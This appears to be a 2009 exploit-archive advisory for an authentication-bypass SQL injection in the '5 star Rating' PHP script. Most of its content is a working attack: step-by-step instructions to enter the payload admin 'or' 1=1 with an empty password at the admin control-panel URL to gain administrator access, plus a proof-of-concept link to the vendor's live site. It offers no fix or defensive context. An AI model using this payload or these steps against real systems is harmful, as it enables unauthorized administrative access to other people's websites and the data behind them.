[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : 5 star Rating 1.2 (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-04-22
# Author : zer0day
# Previous Title : elkagroup Image Gallery 1.0 Arbitrary File Upload Vulnerability
# Next Title : WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities


@@@@@@@@  @@@@@@@@  @@@@@@@    @@@@@@@@   @@@@@@@    @@@@@@   @@@ @@@  
@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@ @@@  
     @@!  @@!       @@!  @@@  @@!   @@@@  @@!  @@@  @@!  @@@  @@! !@@  
    !@!   !@!       !@!  @!@  !@!  @!@!@  !@!  @!@  !@!  @!@  !@! @!!  
   @!!    @!!!:!    @!@!!@!   @!@ @! !@!  @!@  !@!  @!@!@!@!   !@!@!   
  !!!     !!!!!:    !!@!@!    !@!!!  !!!  !@!  !!!  !!!@!!!!    @!!!   
 !!:      !!:       !!: :!!   !!:!   !!!  !!:  !!!  !!:  !!!    !!:    
:!:       :!:       :!:  !:!  :!:    !:!  :!:  !:!  :!:  !:!    :!:    
 :: ::::   :: ::::  ::   :::  ::::::: ::   :::: ::  ::   :::     ::    
: :: : :  : :: ::    :   : :   : : :  :   :: :  :    :   : :     :     
                                                                       

--[ Informations ]------------------------------------------------------

@author : zer0day (zer0day@vodkaorange.com)
@home : gotr00t.blogspot.com
@software : 5star_rating
@version : 1.0
@web site : http://www.maniacomputer.com/5star_rating/New_5Star.html

--[ Exploit ]-----------------------------------------------------------

---{{Authentification ByPass}}
Go to :
http://[TARGET]/5star_rating/admin/control_panel_sample.php
In username just enter : admin 'or' 1=1
and empty password

You are logged in Administrator !

Simply ?

--[ Proof Of Concept ]--------------------------------------------------

http://www.maniacomputer.com/5star_rating/admin/control_panel_sample.php

--[ End Of File ]-------------------------------------------------------

# www.Syue.com [2009-04-22]